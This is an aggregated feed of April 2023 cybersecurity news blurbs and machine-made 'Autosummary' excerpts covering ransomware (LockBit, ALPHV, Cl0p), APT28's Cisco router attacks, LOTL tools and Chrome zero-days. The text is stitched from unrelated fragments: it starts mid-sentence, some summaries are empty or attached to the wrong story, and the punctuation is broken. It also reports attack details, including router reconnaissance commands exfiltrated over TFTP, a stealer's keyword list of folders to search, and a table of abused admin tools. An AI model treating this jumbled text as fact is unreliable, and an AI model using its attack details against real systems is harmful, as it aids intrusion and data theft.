In addition, the malware creates a new process named "Service Policy Lock" that collects the output from the following Command Line Interface (CLI) commands and exfiltrates it using TFTP: show running-config show version show ip interface brief show arp show cdp neighbors show start show ip route show flash All Cisco admins should upgrade their routers to the latest firmware to mitigate these attacks. "Categories: News Categories: Ransomware Tags: LockBit Tags: ransomware Tags: Patrick Wardle Tags: macOS ransomware Tags: first Mac ransomware Tags: Azim Khodjibaev Tags: BleepingComputer Tags: Mark Stockley With plans to offer more ransomware, LockBit has just created a variant for macOS. But, as experts have pointed out, it"s hardly ready for anything. |
The post LockBit ransomware on Mac: Should we worry? appeared first on Malwarebytes Labs.
"Autosummary:
"For most organizations, the main takeaway is Macs are probably safe, for now, but your Windows servers were always the prime target anyway," says Malwarebytes Security Evangelist Mark Stockley.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.(Source: Objective-See) The encryptor is likely a test file Azim Khodjibaev (@AShukuhi), a security researcher at Cisco Talos, floated the theory to BleepingComputer that the encryptors designed for macOS were "meant as a test and were never intended for development in live cyberattacks. "Categories: News Categories: Ransomware Tags: NCR Tags: Aloha Tags: ALPHV Tags: BalckCat Tags: ransomware An issue with the NCR Aloha point-of-sale system turned out to be a ransomware attack claimed by the ALPHV group |
The post Payment giant"s point-of-sale outage caused by ALPHV ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Posted: April 18, 2023 by An issue with the NCR Aloha point-of-sale system turned out to be a ransomware attack claimed by the ALPHV group On April 12, 2023, payment giant NCR reported it was looking into an issue with its point-of-sale (POS) systems that caused an outage, leaving customers unable to use the system.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.We will give you this list after payment," The ransomware-as-a-service (RaaS) group ALPHV, also known as BlackCat or Noberus, is currently one of the most active. "Fraudsters are underestimating the power of AI to detect fake IDs, according to a new report from Ondato. Based on an analysis of millions of ID verifications carried out for its customers in 2022, Ondato found that ID cards were used in 52% of fraudulent verification attempts – far ahead of driving licences (29%) and passports (18%). ID cards used in over half of fraudulent verification attempts According to Ondato, fraudsters most likely underestimate ID … More
The post AI verification systems give businesses an edge over scammers appeared first on Help Net Security.
"Autosummary:
As well as banks and other financial institutions, this can include cryptocurrency marketplaces, gambling services companies, lawyers and notaries, accountants and audit advisors, auction houses and antique dealers. "Autosummary:
"Threat actors (TAs) using built-in data exfiltration methods like [living off the land binaries and scripts] negate the need to bring in external tools that might be flagged by security software and/or human-based security detection mechanisms," Palo Alto Networks Unit 42 researcher Ryan Chapman said. "Autosummary:
QBot phishing email Source: BleepingComputer Attached to these emails is a PDF file named "CancelationLetter-[number].pdf ," that, when opened, displays a message stating, "This document contains protected files, to display them, click on the "open" button. "Autosummary:
Requesting permission to use the Accessibility Service (Cyble) At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection. "Autosummary:
The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco. "Autosummary:
This next-stage artifact is a second loader codenamed Domino Loader, which harbors an encrypted .NET information stealer referred to as Project Nemesis that"s capable of amassing sensitive data from clipboard, Discord, web browsers, crypto wallets, VPN services, and other apps. "Autosummary:
For example, TrickBot, Emotet, BazarBackdoor, and QBot (QakBot) have a long history of providing initial access to ransomware operations, such as REvil, Maze, Egregor, BlackBasta, Ryuk, and Conti. "Autosummary:
A type confusion error occurs when a program uses one type of method to allocate or initialize a resource but uses another method to access that resource, leading to an out-of-bounds memory access, according to cybersecurity firm NSFocus, in an alert it sent about Chrome"s December update. "Categories: Business Good tools gone bad. |
The post Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight appeared first on Malwarebytes Labs.
"Autosummary:
Tool Used For Used To Used By PowerShell Versatile scripting language and shell framework for Windows systems Execute malicious scripts, maintain persistence, and evade detection LockBit, Vice Society, Royal, BianLian, ALPHV, Black Basta PsExec Lightweight command-line tool for executing processes on remote systems Execute commands or payloads via a temporary Windows service LockBit, Royal, ALPHV, Play, BlackByte WMI Admin feature for accessing and managing Windows system components Execute malicious commands and payloads remotely LockBit, Vice Society, Black Basta, Dark Power, Cl0p, BianLian Mimikatz Open source tool for Windows security and credential management Extract credentials from memory and perform privilege escalation LockBit, Black Basta, Cuba, ALPHV Cobalt Strike Commercial pen test to assess network security and simulate advanced threat actor tactics Command and control, lateral movement, and exfiltration of sensitive data LockBit, Black Basta, Royal, ALPHV, Play, Cuba, Vice Society Again, readers of our monthly ransomware review will recognize that each gang listed here are responsible for the lion"s share of yearly ransomware attacks. In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper-hand against RaaS gangs that employ LOTL techniques. "Categories: News In the last 12 months, Germany was one of the most attacked countries in the world, the most attacked in the EU, and a favourite target of the notorious Black Basta group. |
The post Ransomware in Germany, April 2022 – March 2023 appeared first on Malwarebytes Labs.
"Autosummary:
During that period: It was the fourth most attacked country in the world, and the most attacked in the EU The construction sector was harder hit than in the USA, UK, or France LockBit and Black Basta accounted for 54% of known attacks Black Basta attacked targets in Germany far more often than in the UK or France In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents.There were no known attacks on German healthcare in the last 12 months (which, again, does not include unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to have suffered the same problems France has had protecting its government sector, or the UK its education sector. The ten most attacked countries between April 2022 - March 2023, ordered by attacks per capita As in most countries, the German services sector is the most hard hit, accounting for 28% of attacks in the last 12 months, just slightly above the global average of 25%. Known attacks in the ten most attacked countries between April 2022 - March 2023 Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. Ransomware with two or more known attacks in Germany, April 2022 - March 2023 In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight. "Categories: Exploits and vulnerabilities Categories: News Tags: Google Tags: Chrome zero-day Tags: CVE-2023-2033 Tags: V8 flaw Tags: V8 Google has released an updated version of Chrome to address a zero-day flaw that is being exploited in the wild. |
The post Update Chrome now! Google patches actively exploited flaw appeared first on Malwarebytes Labs.
"Autosummary:
In a recent security advisory, Google says it patched a high-severity zero-day security flaw in its Chrome browser—the first in 2023—currently being exploited in the wild by threat actors.The company urges all its Windows, Mac, and Linux users to update to version 112.0.5615.121 immediately, as this flaw is present in Chrome versions before this one. "Categories: News Categories: Scams Tags: Airbnb Tags: TikTok Tags: @livvoogus Tags: Olivia Tags: Mr. Tyler A superhost scammed a woman out of a thousand dollars. She didn"t take it lying down. |
The post Woman tracks down and turns table on Airbnb scammer appeared first on Malwarebytes Labs.
"Autosummary:
"The person who had lived there got evicted because, according to the lease, you"re not allowed to do Airbnbs out of the apartment, and he just never took the listing down," she said. "Categories: News Tags: chrome Tags: browser Tags: update Tags: fake Tags: malware Tags: monero Tags: miner Tags: cryptocurrency Tags: rogue Tags: hacked Tags: compromised Tags: site Tags: website We take a look at a slew of hacked websites pushing fake Chrome updates which are Monero miner malware in disguise. |
The post Fake Chrome updates spread malware appeared first on Malwarebytes Labs.
"Autosummary:
How to update Chrome Updating your web browser, whether Chrome or something else, is incredibly easy to do.At best, you may open up your browser, see a message telling you that you’re now running the latest version, and then go back to not having to think about it.However, a lot of folks out there will probably panic at the sight of the ZIP, assume something has gone horribly wrong with their browser, and open it up. "Autosummary:
"The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.
We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.
Download the UK PDF version of this report:
Download the US PDF version of this report:
Autosummary: Previous Activity The NCSC has previously attributed the following activity to APT28: Cyber attacks against the German parliament in 2015, including data theft and disrupting email accounts of German Members of Parliament (MPs) and the Vice Chancellor Attempted attack against the Organization for the Prohibition of Chemical Weapons (OPCW) in April 2018, to disrupt independent analysis of chemicals weaponized by the GRU in the UK For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Overview and Context The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021. Download the UK PDF version of this report: APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers (PDF, 366.88 KB ) Download the US PDF version of this report: APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers (PDF, 366.25 KB ) Reconnaissance Use of SNMP Protocol to Access Routers In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide. "
Snowflake has launched the Manufacturing Data Cloud, which enables companies in automotive, technology, energy, and industrial sectors to unlock the value of their critical siloed industrial data by leveraging Snowflake’s data platform, Snowflake- and partner-delivered solutions, and industry-specific datasets. The Manufacturing Data Cloud empowers manufacturers to collaborate with partners, suppliers, and customers in a secure and scalable way, driving greater agility and visibility across the entire value chain. With Snowflake’s Manufacturing Data Cloud, organizations can … More
The post Snowflake Manufacturing Data Cloud improves supply chain performance appeared first on Help Net Security.
"Autosummary:
Powering smart manufacturing Native support for semi-structured, structured, and unstructured high-volume Internet of Things (IoT) data in Snowflake enables manufacturers to keep operations running remotely by streamlining operations within and across manufacturing plants, while also leveraging shop floor data in near real-time to predict maintenance needs, analyze cycle time, improve product yield and quality, and meet sustainability goals. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Making risk-based decisions in a rapidly changing cyber climate In this Help Net Security interview, Nicole reveals the three key indicators she uses to assess an industrial organization’s cybersecurity readiness and provides valuable insights for businesses and governments on fortifying their critical infrastructure against cyber threats. Data-backed insights for future-proof cybersecurity strategies In this Help Net Security interview, Travis Smith, … More
The post Week in review: Microsoft patches zero-day, Apple security updates, HashiCorp Vault vulnerability appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: April 14, 2023 Here’s a look at the most interesting products from the past week, featuring releases from BigID, Binarly, Cynalytica, GitGuardian, Netskope, Searchlight Cyber, ThreatX, and Wazuh. Data-backed insights for future-proof cybersecurity strategies In this Help Net Security interview, Travis Smith, VP of the Qualys TRU, talks about the 2023 Qualys TruRisk Threat Research Report, which provides security teams with data-backed insights to help them better understand how adversaries exploit vulnerabilities and render attacks. "Autosummary:
"NCR was the victim of the BlackCat/ALPHV ransomware gang, the attack caused an outage on the company’s Aloha PoS platform. NCR Corporation, previously known as National Cash Register, is an American software, consulting and technology company providing several professional services and electronic products. It manufactures self-service kiosks, point-of-sale terminals, automated teller machines, check processing systems, […]
The post NCR was the victim of BlackCat/ALPHV ransomware gang appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, NCR) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
_check_esxi esxi_ _Esxi _kill_esxi_1 _kill_esxi_2 _kill_esxi_3 _kill_processes _kill_processes_Esxi _killed_force_vm_id _listvms _esxcfg_scsidevs1 _esxcfg_scsidevs2 _esxcfg_scsidevs3 _esxi_disable _esxi_enable Furthermore, the encryptor contains a list of sixty-five file extensions and filenames that will be excluded from encryption, all of them being Windows file extensions and folders. "Researchers warn that the LockBit ransomware gang has developed encryptors to target macOS devices. The LockBit group is the first ransomware gang of all time that has created encryptors to target macOS systems, MalwareHunterTeam team warn. MalwareHunterTeam researchers discovered the LockBit encryptors in a ZIP archive uploaded to VirusTotal. The discovery is disconcerting and demonstrates […]
The post Experts found the first LockBit encryptor that targets macOS systems appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, LockBit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Daon is expanding its IdentityX to the healthcare industry to enable organizations to safeguard identities for providers, staff, and patients. As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. Daon IdentityX provides identity proofing and authentication solutions for every touchpoint – patient care, medical … More
The post Daon brings IdentityX to healthcare industry appeared first on Help Net Security.
"Autosummary:
As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. "Autosummary:
"US Cybersecurity and Infrastructure Security Agency (CISA) added Android and Novi Survey flaws to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: Google addressed the vulnerability CVE-2023-20963 with the release of “The Android Security Bulletin—March 2023” security updates. The […]
The post CISA adds bugs in Android and Novi Survey to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
“Last year we rolled-out a threat actor filtering system that scans user activity for suspicious patterns of behavior, automatically suspends potentially malicious accounts, and alerts Action1’s dedicated security team to investigate the issue” - Mike Walters Action1 is working on including new measures to stop the misuse of the platform, the researcher said, adding that the company is “fully open to cooperation with both victims and legal authorities” on cases where Action1 was leveraged for cyberattacks. "Autosummary:
Some of the impacted apps are: L.POINT with L.PAY - 10 million downloads Swipe Brick Breaker - 10 million downloads Money Manager Expense & Budget - 10 million downloads GOM Player - 5 million downloads LIVE Score, Real-Time Score - 5 million downloads Pikicast - 5 million downloads Compass 9: Smart Compass - 1 million downloads GOM Audio - Music, Sync lyrics - 1 million downloads LOTTE WORLD Magicpass - 1 million downloads Bounce Brick Breaker - 1 million downloads Infinite Slice - 1 million downloads SomNote - Beautiful note app - 1 million downloads Korea Subway Info: Metroid - 1 million downloads According to McAfee"s research team, which discovered Goldoson, the malware can collect data on installed apps, WiFi and Bluetooth-connected devices, and the user"s GPS locations. "Autosummary:
"As a valued customer of NCR Corporation, we are reaching out with additional information about a single data center outage that is impacting a limited number of ancillary Aloha applications for a subset of our hospitality customers," reads an email sent to Aloha POS customers. Since its launch, the ransomware operation has grown into one of the most significant ransomware active at this time, responsible for hundreds of attacks worldwide, with ransom demands ranging from $35,000 to over $10 million. "The illicit market for crypto giveaway scams has expanded, offering various services to facilitate fraudulent activity. The proliferation of fake crypto giveaways can be attributed to the increased availability of tools for scammers, even those with limited technical skills. In this Help Net Security video, Tony Lauro, Director of Security Technology and Strategy at Akamai, discusses why crypto giveaway scams are so successful.
The post Tactics that make crypto giveaway scams so successful appeared first on Help Net Security.
"Autosummary:
"Cymulate has expanded its Attack Surface Management (ASM) solution to close gaps between traditional vulnerability management and ASM. Organizations will now have advanced capabilities to easily visualize risky exposures across hybrid environments. The company achieves this by extending its coverage to include more attack surface discovery and added misconfiguration detection, cloud-specific analysis, and vulnerability discovery. Previously only for external attack surface management, the new enhancements will analyze Active Directory, Azure, GCP, and AWS Cloud footprints … More
The post Cymulate ASM bridges vulnerability management and ASM gaps in hybrid infrastructure appeared first on Help Net Security.
"Autosummary:
Support attack pathing and security validation across networks, clouds, and identity systems, including Active Directory services Deliver a more complete and detailed picture of viable attack paths and techniques than can be discovered when compared to performing such scanning operations only in one infrastructure or the other Factor in that interconnections, trusts, permissions, and other variables can change the path of an attacker in unexpected ways Provide the ability to clearly identify and see attack paths (displayed as graphs and detailed information), which delivers a quicker way to identify and close gaps without disrupting business operations When paired with Cymulate Breach and Attack Simulation (BAS) technology, security teams can also validate whether controls that sit in the attack path successfully detect and alert on threat activity; and where remediation is required, knowing where that remediation can best be performed to reduce any business disruptions. "Autosummary:
Android Framework Privilege Escalation Vulnerability (CVSS score: 7.8) - Android Framework Privilege Escalation Vulnerability CVE-2023-29492 (CVSS score: TBD) - Novi Survey Insecure Deserialization Vulnerability "Android Framework contains an unspecified vulnerability that allows for privilege escalation after updating an app to a higher Target SDK with no additional execution privileges needed," CISA said in an advisory for CVE-2023-20963. "Autosummary:
The nightly backups contained all public forum posts, team forum posts, messages sent through the user-to-user messaging system, and user information such as forum username, email address used for notifications, and an encrypted (hashed and salted) password generated by the MyBB software. "Autosummary:
" The FSB claims that despite many of the attacks being presented as activities by the "IT Army of Ukraine," it was able to discern the involvement of pro-west hacker groups such as "Anonymous," "Sailens," "Goast clan," "Ji-En-Ji," "SquadZOZ," and others. "Open-source media player software provider Kodi discloses a data breach after threat actors stole its MyBB forum database. Kodi has disclosed a data breach, threat actors have stolen the company’s MyBB forum database that contained data for over 400K users and private messages. The threat actors also attempted to sell the stolen data on the […]
The post Kodi discloses data breach after its forum was compromised appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Kodi) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
For example, some of the folders it targets include: *941*", "*1040*", "*1099*", "*8822*", "*9465*", "*401*K*", "*401K*", "*4506*T*", "*4506T*", "*Abkommen*", "*ABRH*", "*Abtretung*", "*abwickeln*", "*ACA*1095*", "*Accordi*", "*Aceito*", "*Acordemen*", "*Acordos*", "*Acuerde*", "*Acuerdo*", "*Addres*", "*Adres*", "*Affectation*", "*agreem*", "*Agreemen*Disclosur*", "*agreement*", "*Alamat*", "*Allocation*", "*angreifen*", "*Angriff*", "*Anmeldeformationen*", "*Anmeldeinformationen*", "*Anmeldenunter*", "*Anmeldung*", "*Anschrift*", "*Anspruch*", "*Ansspruch*", "*Anweisung*", "*AnweisungBank*", "*anxious*", "*Análise*", "*Apotheke*", "*ARH*", "*Asignación*", "*Asignatura*", "*Assegnazione*", "*Assignation*", "*Assignment*", "*Atribuição*", "*attorn*", "*Audit*", "*Auditnaadrese*", "*Aufführen*", "*Aufgabe*", "*Aufschühren*", "*Auftrag*", "*auftrunken*", "*Auftrunkinen*", "*Auswertung*", "*Avaliação*", "*Avaliações*", "*Avtal*", "*balanc*", "*bank*", "*Bargeld*", "*Belästigung*", "*Benef*", "*benefits*", "*Bericht*", "*Beschäftigung*", "*Betrug*", "*Bewertung*", "*bezahlen*", "*billing*", "*bio*" The PowerShell script uses system-native cmdlets like “Get-ChildItem” and “Select-String” to search and exfiltrate data from the infected machine, minimizing its footprint and maintaining a stealthy profile. "Autosummary:
New "treatments" on the Start Menu for Windows Insiders (Microsoft) The list of new "treatments" being tested in this Windows Insider build includes the following prompts: Sign in to your Microsoft account. "Autosummary:
Google TAG frequently discovers and reports zero-day bugs exploited in highly-targeted attacks by government-sponsored threat actors aiming to install spyware on devices of high-risk individuals, including journalists, opposition politicians, and dissidents worldwide. "Autosummary:
"Microsoft has addressed 97 existing vulnerabilities this April Patch Tuesday, with a further eight previously released patches updated and re-released. There have been reports of a vulnerability (CVE-2023-28252) exploited in the wild, making it a "Patch Now" release.
This update cycle affects Windows desktops, Microsoft Office, and Adobe Reader. No updates for Microsoft Exchange this month. The team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this April update cycle.
Autosummary:
Windows This April, Microsoft released seven critical updates and 71 patches rated as Important to the Windows platform that cover the following key components (for the critical updates): Microsoft Message Queuing Windows Layer 2 Tunneling Protocol Windows DHCP Server Unfortunately, this month there have been reports of a vulnerability (CVE-2023-28252) exploited in the wild, adding to our zero-day count. Updates by product family Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge) Microsoft Windows (both desktop and server) Microsoft Office Microsoft Exchange Server Microsoft Development platforms (ASP.NET Core, .NET Mitigations and workarounds Microsoft has published the following vulnerability related mitigations for this month"s April Patch Tuesday release cycle: CVE-2023-23397: To mitigate against this Microsoft Outlook elevation of privilege vulnerability, Microsoft recommends, "Administrators should add users to the Protected Users Security Group, which prevents the use of NTLM as an authentication mechanism. Browsers This April patch cycle sees the return of patches to the Microsoft Edge browser platform with just three updates (CVE-2023-28284, CVE-2023-24935, and CVE-2023-28301), all rated as low by Microsoft. CVE-2023-23413, CVE-2023-24867, CVE-2023-24907, CVE-2023-24909: Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability. "The much-dreaded writer’s block isn’t the only threat that may derail your progress. Are you doing enough to keep your blog (and your livelihood) safe from online dangers?
The post Safety first: 5 cybersecurity tips for freelance bloggers appeared first on WeLiveSecurity
"Autosummary:
Keep your CMS and plugins updated When Ghost, Drupal, WordPress, Joomla, or another CMS tells you of the availability of a new version, act on it. 1. Use secure login credentials Surprisingly, password security in today’s age is still lax, as people even now tend to use the same weak passwords that can be hacked in mere seconds; therefore, a healthy attitude toward passwords is a must.Said data might include emails for your newsletter, credit card numbers for purchases (or subscriptions, Patreon, etc.), and passwords. "Google released an emergency security update to address a zero-day vulnerability in Chrome which is actively exploited in the wild. Google released an emergency security update to address the first Chrome zero-day vulnerability (CVE-2023-2033) in 2023, the company is aware of attacks in the wild exploiting the issue. The vulnerability is a Type Confusion issue that resides in the JavaScript engine […]
The post Google fixed the first Chrome zero-day of 2023 appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @demonslay335, @malwareforme, @malwrhunterteam, @fwosar, @BleepinComputer, @Seifreed, @struppigel, @billtoulas, @Ionut_Ilascu, @serghei, @McAfee, @Fortinet, @Threatlabz, @pcrisk, and @GossiTheDog. "Categories: News Tags: kidnap Tags: scam Tags: virtual Tags: AI Tags: voice Tags: fake Tags: fraud Tags: hoax Tags: kidnapping We take a look at claims that AI is now being used for a notorious form of kidnapping hoax. |
The post Is AI being used for virtual kidnapping scams? appeared first on Malwarebytes Labs.
"Autosummary:
The scammers dropped the ransom down to $50k after being told that the money simply wasn"t available, and while all of this was going on, a friend of the family, and law enforcement, were able to confirm that the supposedly kidnapped daughter was in fact safe and well.It"s definitely not an exact science, and getting the voice right can take many attempts, samples, and requires an AI tool that can stitch everything together to an acceptable standard.To hear for yourself, take a listen to podcast.ai, a podcast entirely generated by AI, that features guests like the late Steve Jobs. "Votiro has integrated with Sumo Logic to enable reliable and secure cloud-native applications. Users can now send high-fidelity data and insights discovered by Votiro Cloud into the Sumo Logic Cloud SIEM console. Enterprises are relying on collaboration platforms, cloud workloads and storage environments more than ever before. File sharing and Cloud data usage will continue to expand, providing more opportunities for bad actors to penetrate enterprise networks through file-borne malware. Sumo Logic’s Cloud SIEM automatically … More
The post Votiro collaborates with Sumo Logic to provide analytics on file-borne threats appeared first on Help Net Security.
"Autosummary:
“We are excited to announce this integration with Sumo Logic to arm security teams with an open, API-based solution to detect, disarm and respond to relevant threats,” Srinivasan added. "The Cornwall Community Hospital in Ontario, Canada, is under a cyber attack that is causing delays to scheduled and non-urgent care. A cyberattack on the Cornwall Community Hospital in Ontario, Canada, is causing delays to scheduled and non-urgent care. The cyber attack was discovered on Tuesday, April 11, 2023, it is investigating the incident with […]
The post A cyberattack on the Cornwall Community Hospital in Ontario is causing treatment delays appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Heathcare) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Wazuh launched Wazuh 4.4, the latest version of its open source security platform. The latest version adds multiple new features, including IPv6 support for the enrollment process and agent-manager connection, and support for Azure integration within Linux agents. Today’s leading enterprises require world-class protection of workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh 4.4 enhances the comprehensive and customizable solution with greater flexibility to combat breaches, ransomware, and cyberattacks all from a single agent. … More
The post Wazuh 4.4 combats breaches, ransomware, and cyberattacks all from a single agent appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" What"s in scope, however, are defects in OpenAI APIs, ChatGPT (including plugins), third-party integrations, public exposure of OpenAI API keys, and any of the domains operated by the company. "It used to be that people were the greatest cybersecurity vulnerability, but this is no longer true. The rise of the internet made people more connected than ever. Attackers capitalized on that fact and targeted employees directly to gain access to an organization. Leveraging highly automated methods (such as phishing that redirects users to compromised websites), attackers must only fool one employee to start a catastrophic attack against the entire organization. These methods are extremely … More
The post The new weakest link in the cybersecurity chain appeared first on Help Net Security.
"Autosummary:
These exposed systems are highly heterogeneous, including everything from database servers, core business applications, and workstations to embedded systems like cameras, IoT devices, and even building control systems; all scattered across the world wherever the company has a presence.Attackers have come to realize that such unmonitored systems present the same opportunity of access employees once did – namely, an attack surface that can be found and exploited using highly automated, low-cost methods.Thus, the employees-are-our-weakest-link mantra became an unquestioned industry dictum, embraced by both defenders and attackers. "Autosummary:
While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what"s perceived as a "significant" pivot. "Fortinet addressed a critical vulnerability that can lead to remote, unauthenticated access to Redis and MongoDB instances. Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can […]
The post Fortinet fixed a critical vulnerability in its Data Analytics product appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
" WhatsApp introduced end-to-end encryption 7 years ago, in April 2016, and rolled out end-to-end encrypted chat backups on iOS and Android in October 2021 to block access to chat contents, regardless of where they"re stored. "Autosummary:
"Autosummary:
To that end, CIS countries, as well as morgues, hospitals, COVID-19 vaccine-related corporations, critical infrastructure, law enforcement, and other prominent companies are off-limits for the group. "Security experts warn that a Kyocera Android printing app is vulnerable to improper intent handling and can be abused to drop malware. An improper intent handling issue affecting the Kyocera Android printing app can allow malicious applications to drop malware. Such kinds of flaws expose a resource to the wrong control sphere, providing unintended actors with inappropriate […]
The post A flaw in the Kyocera Android printing app can be abused to drop malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Kyocera Android printing app) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"I believe you would require a copy of our most recent year"s documents, such as W-2s, 1099s, mortages, interest, donations, medical investments, HSAs, and so on which I have uploaded below. "Categories: Ransomware Categories: Threat Intelligence Cl0p was the most used ransomware in March 2023, dethroning the usual frontrunner LockBit, after breaching over 104 organizations with a zero-day vulnerability. |
The post Ransomware review: April 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by gang, March 2023 Known ransomware attacks by country, March 2023 Known ransomware attacks by industry sector, March 2023 Fortra, the company behind GoAnywhere MFT, released an emergency patch (7.1.2) for the vulnerability in early February—but by then, Cl0p had already used it to break into a myriad of networks and deploy ransomware.Between them, the Anglosphere countries of the USA, Canada, UK, and Australia accounted for 69% of known Cl0p attacks, with Canada and Australia suffering more attacks than countries with bigger populations and economies, like Germany and France.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.This attack, which is said to have begun on or around March 6, created severe ramifications for the organization, disrupting freight carrier pickups, online orders, and access to customer support. March has also seen some intriguing activity from other ransomware gangs like DarkPower, which appeared to be turning on and off throughout the month, as well as BianLian, which has shifted its focus from encrypting files altogether to pure data-leak extortion. "Categories: Ransomware Categories: Threat Intelligence In the last 12 months France was one of the most attacked countries in the world, and a favourite target of LockBit, the world"s most dangerous ransomware. |
The post Ransomware in France, April 2022–March 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known attacks in the ten most attacked countries, April 2022 - March 2023 Given the disparity between the USA and the rest of the world in terms of number of attacks it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. The ten most attacked countries between April 2022 - March 2023, ordered by attacks per capita By any measure, France is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs.By comparison, over the same twelve month period, 4% of known attacks in the USA and 3% of known attacks in Germany affected their government sectors, while just 20 miles across the English channel, the UK experienced none at all. Monthly ransomware attacks in France with LockBit highlighted, April 2022 - March 2023 The reasons for this aren"t clear, but it may simply be that as the 800lb gorilla in the ransomware ecosystem, LockBit is best placed to exploit opportunities outside of the Anglosphere.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.In all, LockBit was used in 57% of known attacks in France, while the next most used ransomware, Vice Society, accounted for just 6%. "Categories: News Tags: FBI Tags: extortion Tags: sextortion Tags: crime Tags: criminal Tags: nude Tags: nudes Tags: photographs Tags: images Tags: video Tags: photo Tags: scam Tags: payment Tags: profit Tags: assistance Tags: help We take a look at an FBI warning regarding for-profit entities making money from people targeted by sextortion attacks. |
The post Sextortion "assistance" scammers con victims further appeared first on Malwarebytes Labs.
"Autosummary:
